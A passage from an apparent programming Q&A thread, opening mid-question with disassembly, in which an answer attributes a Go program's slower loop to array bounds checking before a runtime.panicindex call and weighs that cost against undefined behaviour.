4005b9: 75 e5 jne 4005a0 <test+0x30>
4005bb: f3 c3 repz retq
4005bd: 0f 1f 00 nopl (%rax)
Could somebody explain it? Thanks!
The main difference is the array bounds checking. In the disassembly dump for the Go program, there is:
400c89: 48 83 fb 02 cmp $0x2,%rbx
400c8d: 73 2d jae 400cbc <main.test+0xbc>
...
400cbc: e8 6f e0 00 00 callq 40ed30 <runtime.panicindex>
400cc1: 0f 0b ud2
So if %rbx is greater than or equal to 2, then it jumps down to a call to runtime.panicindex. Given you're working with an array of size 2, that is clearly the bounds check. You could make the argument that the compiler should be smart enough to skip the bounds check in this particular case where the range of the index can be determined statically, but it seems that it isn't smart enough to do so yet.
While you're seeing a noticeable performance difference for this micro-benchmark, it might be worth considering whether this is actually representative of your actual code. If you're doing other stuff in your loop, the difference is likely to be less noticeable.
And while bounds checking does have a cost, in many cases it is better than the alternative of the program continuing with undefined behaviour.

Resources